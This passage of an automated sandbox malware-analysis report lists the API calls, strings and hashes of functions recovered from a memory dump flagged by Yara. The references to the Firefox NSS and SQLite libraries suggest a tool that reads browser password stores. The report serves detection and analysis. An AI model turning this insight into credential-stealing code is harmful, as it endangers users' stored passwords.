                                                                                                    • API String ID: 3604893535-0
                                                                                                    • Opcode ID: f7dab41529206fe118064f33433a64f3ac3ab181816dad8c93fae452124a12fc
                                                                                                    • Instruction ID: 45c0c7ac1ccb111e27c198559328e80ded3d3e222c67d2b1df1e31b25aa67ccd
                                                                                                    • Opcode Fuzzy Hash: f7dab41529206fe118064f33433a64f3ac3ab181816dad8c93fae452124a12fc
                                                                                                    • Instruction Fuzzy Hash: 0A116D7A904605FFE7105BE4EC4CB9E7BB8FB46361F104076F902E22A0DB7499518B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041029D, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,7601F3A0,004103F3,?,?,?,?,?,00000000), ref: 004102AC
                                                                                                    • GetModuleHandleW.KERNEL32(sqlite3.dll,?,7601F3A0,004103F3,?,?,?,?,?,00000000), ref: 004102B5
                                                                                                    • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,7601F3A0,004103F3,?,?,?,?,?,00000000), ref: 004102BE
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,7601F3A0,004103F3,?,?,?,?,?,00000000), ref: 004102CD
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,7601F3A0,004103F3,?,?,?,?,?,00000000), ref: 004102D4
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,7601F3A0,004103F3,?,?,?,?,?,00000000), ref: 004102DB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHandleLibraryModule
                                                                                                    • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                    • API String ID: 662261464-3550686275
                                                                                                    • Opcode ID: c834dd8fc15be32e6963ef283b10e82b70fda7313d2e9eb454bc751375ef20af
                                                                                                    • Instruction ID: b7f17b401a0178620fb75844b9b1c17e2922a7d54258a5a42427569dc52fb87f
                                                                                                    • Opcode Fuzzy Hash: c834dd8fc15be32e6963ef283b10e82b70fda7313d2e9eb454bc751375ef20af
                                                                                                    • Instruction Fuzzy Hash: 60E0DF2AA4237C624A2023F12C4DE6B3E4CD8D2AE131400B3A900A33409EED9C814AF8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040738A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004074B0,?,00000000,?,0040CED0,00000000), ref: 004073AF
                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004074B0,?,00000000,?,0040CED0), ref: 004073CD
                                                                                                    • wcslen.MSVCRT ref: 004073DA
                                                                                                    • wcscpy.MSVCRT ref: 004073EA
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004074B0,?,00000000,?,0040CED0,00000000), ref: 004073F4
                                                                                                    • wcscpy.MSVCRT ref: 00407404
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                    • API String ID: 2767993716-572158859
                                                                                                    • Opcode ID: f174b6a2c9643eb8d08a0d381a31d20715b3df27d902079004213ad135b05ed8
                                                                                                    • Instruction ID: 800b353b1d4fc6a32e70edfd69f33956e03ae836be37624ff684d09eaf5204b4
                                                                                                    • Opcode Fuzzy Hash: f174b6a2c9643eb8d08a0d381a31d20715b3df27d902079004213ad135b05ed8
                                                                                                    • Instruction Fuzzy Hash: 8501D432504118BBFB155B51EC4AF9F7A6CDB05791F30002AFD05A11D1DA756E40E6AC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B07D, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407813: GetFileAttributesW.KERNELBASE(?,0040B086,?,0040B13D,00000000,?,00000000,00000208,?), ref: 00407817
                                                                                                    • wcscpy.MSVCRT ref: 0040B097
                                                                                                    • wcscpy.MSVCRT ref: 0040B0A7
                                                                                                    • GetPrivateProfileIntW.KERNEL32(004520D8,rtl,00000000,00451EC8), ref: 0040B0B8
                                                                                                      • Part of subcall function 0040AC1D: GetPrivateProfileStringW.KERNEL32(004520D8,?,0044450C,00452160,?,00451EC8), ref: 0040AC39
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                    • Opcode ID: f4896dd2d409210cfa90326f34adfe9f8ffa68e78c69cd9b2a113fae2530117d
                                                                                                    • Instruction ID: 17d1a7b6b3aff6a527b8aab65c721acec7fa83354aa5f553bb5dabff298b8050
                                                                                                    • Opcode Fuzzy Hash: f4896dd2d409210cfa90326f34adfe9f8ffa68e78c69cd9b2a113fae2530117d
                                                                                                    • Instruction Fuzzy Hash: 9AF0C262F8461136F71272224E07F2B26148B93B26F55407FBA097A3C3DAAC4D01969E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042D64E, Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • database %s is already in use, xrefs: 0042D71F
                                                                                                    • out of memory, xrefs: 0042D8BC
                                                                                                    • database is already attached, xrefs: 0042D778
                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042D6BD
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042D7C6
                                                                                                    • too many attached databases - max %d, xrefs: 0042D6A7
                                                                                                    • unable to open database: %s, xrefs: 0042D8A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                    • Opcode ID: a4127d8fd8eb298ba5b639d799cccf0f78ff86a6c0de0581acf7c708331a8be8
                                                                                                    • Instruction ID: 0b91eda2dc10f36653d855472d8a55dcaa7930a60f2393585d0abff3e25e6764
                                                                                                    • Opcode Fuzzy Hash: a4127d8fd8eb298ba5b639d799cccf0f78ff86a6c0de0581acf7c708331a8be8
                                                                                                    • Instruction Fuzzy Hash: 6F91BF70F00315AFEB10EF65D881B9ABBF0AF44308F64845FE4559B242DB78EA81CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B6E4, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B4D1
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B4DF
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B4F0
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B507
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B510
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B724
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B740
                                                                                                    • memcpy.MSVCRT ref: 0040B765
                                                                                                    • memcpy.MSVCRT ref: 0040B779
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B7FC
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B806
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B83E
                                                                                                      • Part of subcall function 0040A6F4: GetModuleHandleW.KERNEL32(00000000,?,?,0040B7A4,?,0040EA24,00000000,00000000,?), ref: 0040A733
                                                                                                      • Part of subcall function 0040A6F4: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A7CC
                                                                                                      • Part of subcall function 0040A6F4: memcpy.MSVCRT ref: 0040A80C
                                                                                                      • Part of subcall function 0040A6F4: wcscpy.MSVCRT ref: 0040A775
                                                                                                      • Part of subcall function 0040A6F4: wcslen.MSVCRT ref: 0040A793
                                                                                                      • Part of subcall function 0040A6F4: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B7A4,?,0040EA24,00000000,00000000,?), ref: 0040A7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                    • String ID: ($d
                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                    • Opcode ID: 75c249cc44e2d3592bd8bfa2475def689ef79217d5922fd223afd09cc3498039
                                                                                                    • Instruction ID: e3304c1a05809e48f6647fcf99c70156accfc3bf7c80f15f4f00f3ff71e68012
                                                                                                    • Opcode Fuzzy Hash: 75c249cc44e2d3592bd8bfa2475def689ef79217d5922fd223afd09cc3498039
                                                                                                    • Instruction Fuzzy Hash: 5C515A72601700AFD724DF2AC586B5AB7E8EF48314F20892EE55ACB791DB74E940CB48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041661D, Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045262C,00415D39,00000000,?,00000000,00000000), ref: 00416647
                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041664E
                                                                                                    • GetLastError.KERNEL32 ref: 0041665B
                                                                                                    • Sleep.KERNEL32(00000064), ref: 00416670
                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045262C,00415D39,00000000,?,00000000,00000000), ref: 00416679
                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00416680
                                                                                                    • GetLastError.KERNEL32 ref: 0041668D
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004166A2
                                                                                                    • free.MSVCRT(00000000), ref: 004166AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2802642348-0
                                                                                                    • Opcode ID: 7c04c858a52d6d3beeeb776fa94dc9b9cb360ff06a77cec27e7e8ed4a2a2a9c6
                                                                                                    • Instruction ID: a3af57c5f8b48454ee42bf8bc7ef7ab6e5bcfe72dccfc8a1e055486e3767d726
                                                                                                    • Opcode Fuzzy Hash: 7c04c858a52d6d3beeeb776fa94dc9b9cb360ff06a77cec27e7e8ed4a2a2a9c6
                                                                                                    • Instruction Fuzzy Hash: 981129395056109BCA2037B4AC88BFF362197E7335B23022BFE23922D0DA29CCD1542E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A6F4, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040B7A4,?,0040EA24,00000000,00000000,?), ref: 0040A733
                                                                                                    • wcscpy.MSVCRT ref: 0040A775
                                                                                                      • Part of subcall function 0040ABE6: memset.MSVCRT ref: 0040ABF9
                                                                                                      • Part of subcall function 0040ABE6: _itow.MSVCRT ref: 0040AC07
                                                                                                    • wcslen.MSVCRT ref: 0040A793
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B7A4,?,0040EA24,00000000,00000000,?), ref: 0040A7A1
                                                                                                    • LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A7CC
                                                                                                    • memcpy.MSVCRT ref: 0040A80C
                                                                                                      • Part of subcall function 0040A652: ??2@YAPAXI@Z.MSVCRT ref: 0040A68C
                                                                                                      • Part of subcall function 0040A652: ??2@YAPAXI@Z.MSVCRT ref: 0040A6AA
                                                                                                      • Part of subcall function 0040A652: ??2@YAPAXI@Z.MSVCRT ref: 0040A6C8
                                                                                                      • Part of subcall function 0040A652: ??2@YAPAXI@Z.MSVCRT ref: 0040A6E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                    • String ID: strings
                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                    • Opcode ID: 9087ddf45c165e7b2fbb10debf8e75df3471e0a31111bd7afe74881c7b587318
                                                                                                    • Instruction ID: 7cc817081e95d68b3b206d2d338a3926d82764ed35c2ca5a04b20b75e6934ee2
                                                                                                    • Opcode Fuzzy Hash: 9087ddf45c165e7b2fbb10debf8e75df3471e0a31111bd7afe74881c7b587318
                                                                                                    • Instruction Fuzzy Hash: 1F416D766003029BD7189F14EE95E223375F7A6306B50813FE801A73A2DBB9E857CB1D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004075C6, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 004075CE
                                                                                                    • wcslen.MSVCRT ref: 004075DB
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040DF71,-00000210), ref: 004075EB
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,0040DF71,-00000210), ref: 004075F8
                                                                                                    • memcpy.MSVCRT ref: 00407601
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040760A
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00407613
                                                                                                    • CloseClipboard.USER32 ref: 00407623
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1213725291-0
                                                                                                    • Opcode ID: 4e8909f3b8cf3d074f30681ebeb3803dd6ba315dba16d9db384dfaead67a08ca
                                                                                                    • Instruction ID: d2e5c6d0f719b94287ed0c0dd3e24ac2492ee7fdb6e0240e1413c4facc0c9f32
                                                                                                    • Opcode Fuzzy Hash: 4e8909f3b8cf3d074f30681ebeb3803dd6ba315dba16d9db384dfaead67a08ca
                                                                                                    • Instruction Fuzzy Hash: 03F0B43B5006286BD2102BE5BC4DF2B776CEBC6B96F01003AF60AD2251DE78580587BD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C55E, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407441: wcslen.MSVCRT ref: 0040744E
                                                                                                      • Part of subcall function 00407441: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040C419,00000000,00444990,00000000,0040CE28,00000000), ref: 0040745D
                                                                                                    • wcscat.MSVCRT ref: 0040C62D
                                                                                                    • _snwprintf.MSVCRT ref: 0040C654
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite_snwprintfwcscatwcslen
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 2451617256-4153097237
                                                                                                    • Opcode ID: 84f69b77224ed2d97ba31a768a7f8b51d457cf00209447652fbb9fa62ea42cf9
                                                                                                    • Instruction ID: 297ddf3579a2c59a02b88bbd33b0f1d10eae8642267d7ac728a9fa8d919a4caa
                                                                                                    • Opcode Fuzzy Hash: 84f69b77224ed2d97ba31a768a7f8b51d457cf00209447652fbb9fa62ea42cf9
                                                                                                    • Instruction Fuzzy Hash: 9C318B31900219EFDF14EF55CC86AAE7BB5FF04320F20416AF805AB1A2DB75AA91DB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00442459, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcscpy.MSVCRT ref: 0044246E
                                                                                                    • wcscat.MSVCRT ref: 0044247D
                                                                                                    • wcscat.MSVCRT ref: 0044248E
                                                                                                    • wcscat.MSVCRT ref: 0044249D
                                                                                                    • VerQueryValueW.VERSION(?,?,00000000,?), ref: 004424B7
                                                                                                      • Part of subcall function 00407712: wcslen.MSVCRT ref: 00407719
                                                                                                      • Part of subcall function 00407712: memcpy.MSVCRT ref: 0040772F
                                                                                                      • Part of subcall function 004077DC: lstrcpyW.KERNEL32(?,?), ref: 004077F1
                                                                                                      • Part of subcall function 004077DC: lstrlenW.KERNEL32(?), ref: 004077F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                    • String ID: \StringFileInfo\
                                                                                                    • API String ID: 393120378-2245444037
                                                                                                    • Opcode ID: f9d05f8536e01cb3ad13ce1e3f2bf368eca74fae791a91bed11c4d6dc279634a
                                                                                                    • Instruction ID: 52feda3e94929df7a42802c30dde5d0da397389c9915775d2a4ccc83f6e952a4
                                                                                                    • Opcode Fuzzy Hash: f9d05f8536e01cb3ad13ce1e3f2bf368eca74fae791a91bed11c4d6dc279634a
                                                                                                    • Instruction Fuzzy Hash: 0F018F72D0020CAAEF51EBA1CE45EDF737CAB14304F5005B7B514E2052EE78EB869B68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004166C9, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004166FB
                                                                                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00416709
                                                                                                    • free.MSVCRT(00000000), ref: 0041674F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFilefreememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2507021081-0
                                                                                                    • Opcode ID: 8c9eed61ad6d5fe3c01118a3c24a2ffa8a88d03d6ea752387171b4dbda9f9604
                                                                                                    • Instruction ID: 1e9e26847e99b9c8a177196bf33cc4e17cae5d2f4752a1ec39e8ba4400f465d6
                                                                                                    • Opcode Fuzzy Hash: 8c9eed61ad6d5fe3c01118a3c24a2ffa8a88d03d6ea752387171b4dbda9f9604
                                                                                                    • Instruction Fuzzy Hash: 1111E4369041059BDB20ABA59DC99FF77A9EB4435CB26013BFD31E22C0D678DD80826E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004155F4, Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004155FB
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00415619
                                                                                                    • malloc.MSVCRT ref: 00415623
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041563A
                                                                                                    • free.MSVCRT(?), ref: 00415643
                                                                                                    • free.MSVCRT(?,?), ref: 00415661
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4131324427-0
                                                                                                    • Opcode ID: 96cfce1602b34f2f5de663679515390f951ede66be0b477b8ca7018c5fe3b50f
                                                                                                    • Instruction ID: b1a9c7150d3a6bc0bceba67e74b652d675e6cbd2d08ce08a059c7f4e34d3b6de
                                                                                                    • Opcode Fuzzy Hash: 96cfce1602b34f2f5de663679515390f951ede66be0b477b8ca7018c5fe3b50f
                                                                                                    • Instruction Fuzzy Hash: 6901F732A04525FBAB1197A6AC01DEF3B9DDF953B47700226FD19E7280EA78DD4141EC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416296, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00415E62), ref: 004162DA
                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00415E62), ref: 00416302
                                                                                                    • free.MSVCRT(00000000,0044B478,00000000), ref: 0041632A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PathTemp$free
                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                    • API String ID: 924794160-1420421710
                                                                                                    • Opcode ID: 87fc27c6ef0b39c7f2cc13616ceafd29230b51490d6983d0df5024bb80b4810d
                                                                                                    • Instruction ID: 4f74c24e383fbb5972fd37cdc208c36c19199786c9b68d98320f8f6d592c366b
                                                                                                    • Opcode Fuzzy Hash: 87fc27c6ef0b39c7f2cc13616ceafd29230b51490d6983d0df5024bb80b4810d
                                                                                                    • Instruction Fuzzy Hash: 4F314831A042099AE724E6659C41BFB33AC9FA4308F1504BFE891D6283EB7CDEC1865D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E00E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E03E
                                                                                                      • Part of subcall function 00407845: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040B282,00000000,0040B135,?,00000000,00000208,?), ref: 00407850
                                                                                                    • wcsrchr.MSVCRT ref: 0040E058
                                                                                                    • wcscat.MSVCRT ref: 0040E074
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                    • String ID: .cfg$General
                                                                                                    • API String ID: 776488737-1188829934
                                                                                                    • Opcode ID: 7ee66a92cc61633e57ff019e71e2d9db191d9a1a0434f55d7360e8092a04698c
                                                                                                    • Instruction ID: 40447500920d2af67a8356f8b258e7fc23853fb1d5f1dd1a16debd2b4e9e5c44
                                                                                                    • Opcode Fuzzy Hash: 7ee66a92cc61633e57ff019e71e2d9db191d9a1a0434f55d7360e8092a04698c
                                                                                                    • Instruction Fuzzy Hash: 9911C47690132CABDB20EF51CC49ACE73B8BF08314F1041B7B508A7142D778AE94CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407488, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,0040CED0,00000000,?,?,?,0040EABF,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040749C
                                                                                                    • _snwprintf.MSVCRT ref: 004074C9
                                                                                                    • MessageBoxW.USER32(?,?,Error,00000030), ref: 004074E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                    • String ID: Error$Error %d: %s
                                                                                                    • API String ID: 313946961-1552265934
                                                                                                    • Opcode ID: 845ef6c7277024de194b7ac9a53f72fc2eddbeb9e665c8917f2fc0fe65bc49d4
                                                                                                    • Instruction ID: 86c87a67bd925f08f9f0964ca09d76b2f0618c4d30669aeda20578738761d16c
                                                                                                    • Opcode Fuzzy Hash: 845ef6c7277024de194b7ac9a53f72fc2eddbeb9e665c8917f2fc0fe65bc49d4
                                                                                                    • Instruction Fuzzy Hash: CEF0AE7A50060867DB11A794CC05FDA73ACBB95791F1400B7BD04E2191EAF8AA448E59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004063D3, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$wcscatwcscpy
                                                                                                    • String ID: nss3.dll
                                                                                                    • API String ID: 1250441359-2492180550
                                                                                                    • Opcode ID: 94c71f6c563266775de21b67827a91581f4943ce6b6e175fcd6dc0205135e124
                                                                                                    • Instruction ID: 99b4eb86e7b4ae4092f67b1303c8331ecc58c028a47109f3c5964875043b383e
                                                                                                    • Opcode Fuzzy Hash: 94c71f6c563266775de21b67827a91581f4943ce6b6e175fcd6dc0205135e124
                                                                                                    • Instruction Fuzzy Hash: 8C110BB2C0421D9BDF20EB54DD49BDA73ACAB10314F1004B7F50DE21C1FB78AA448A5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B52B, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B4D1
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B4DF
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B4F0
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B507
                                                                                                      • Part of subcall function 0040B4C5: ??3@YAXPAX@Z.MSVCRT ref: 0040B510
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B546
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B559
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B56C
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B57F
                                                                                                    • free.MSVCRT(00000000), ref: 0040B5B8
                                                                                                      • Part of subcall function 004082DE: free.MSVCRT(00000000,00408663,00000000,?,00000000), ref: 004082E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2241099983-0
                                                                                                    • Opcode ID: 14c72df8732756379bdaac5658d9c96a44917a05b6a77ff2ed302b5a9c80bf70
                                                                                                    • Instruction ID: ab6972804d4dd0b49cc14e8f7f8eac8314cc4bbd80a7ed8a769d5f70619a81fc
                                                                                                    • Opcode Fuzzy Hash: 14c72df8732756379bdaac5658d9c96a44917a05b6a77ff2ed302b5a9c80bf70
